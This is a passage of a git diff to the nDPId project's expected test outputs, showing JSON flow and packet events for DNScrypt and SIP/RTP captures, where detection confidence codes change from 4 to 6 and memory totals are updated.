CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":111,"packets-processed":111,"total-skipped-flows":0,"total-l4-payload-len":38586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1491813286913} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 111/111 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5965290 bytes -~~ total memory freed........: 5965290 bytes -~~ total allocations/frees...: 118279/118279 +~~ total memory allocated....: 6098924 bytes +~~ total memory freed........: 6098924 bytes +~~ total allocations/frees...: 121041/121041 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1269 chars diff --git a/test/results/sip.pcap.out b/test/results/sip.pcap.out index b68577571..9768b0dd9 100644 --- a/test/results/sip.pcap.out +++ b/test/results/sip.pcap.out 
@@ -2,35 +2,35 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1120469572844} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01054{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469572844,"pkt":"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"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 01078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469572981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1120469572981,"pkt":"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"} 
01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469590259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":722,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":722,"pkt_l4_len":688,"thread_ts_msec":1120469590259,"pkt":"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"} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":12,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1120469572844,"flow_last_seen":1120469847809,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":5362,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1120469847809,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1120469572844,"flow_last_seen":1120470032084,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8957,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":12,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1120469572844,"flow_last_seen":1120469847809,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":5362,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1120469847809,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1120469572844,"flow_last_seen":1120470032084,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8957,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049188,"pkt":"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"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1120470049696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049696,"pkt":"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"} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1120470050699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470050699,"pkt":"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"} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":44,"source":"sip.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":43,"total-skipped-flows":0,"total-l4-payload-len":17733,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":2,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1120470187658} 
-00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1120470216689,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470235521,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":60,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1120469572844,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14281,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1120470216689,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470235521,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":60,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1120469572844,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14281,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","packets-captured":69,"packets-processed":68,"total-skipped-flows":0,"total-l4-payload-len":27248,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":5,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1120470796804} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":71,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469572844,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":19440,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":71,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469572844,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":19440,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAEC1PIhJHUwncgAtBjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4ODAMABwYAAwMGBwEEBgYbHxwRaWBiFREQFGoTFWBpYX10UltZ10dcVlJVREtCdVlzeFp8bmgUag=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1120470985418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985418,"pkt":"ADBUADRWAODtAW69CABFAADIa\/0AAIARFmfAqAEC1PIhJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy\/H2z83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZUNxWll+YGZ6cnJJZXpgeF1EQg=="} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1120470985421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgAhvsAAABhg3lstxcX5wdtbF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZW1kYWdlamoREhAQEx4fHx0XahRvRl1F3V5ESdbQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120470986363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1120470986363,"pkt":"ADBUADRWAODtAW69CABFAACEbAUAAIARFqPAqAEC1PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAA="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} 
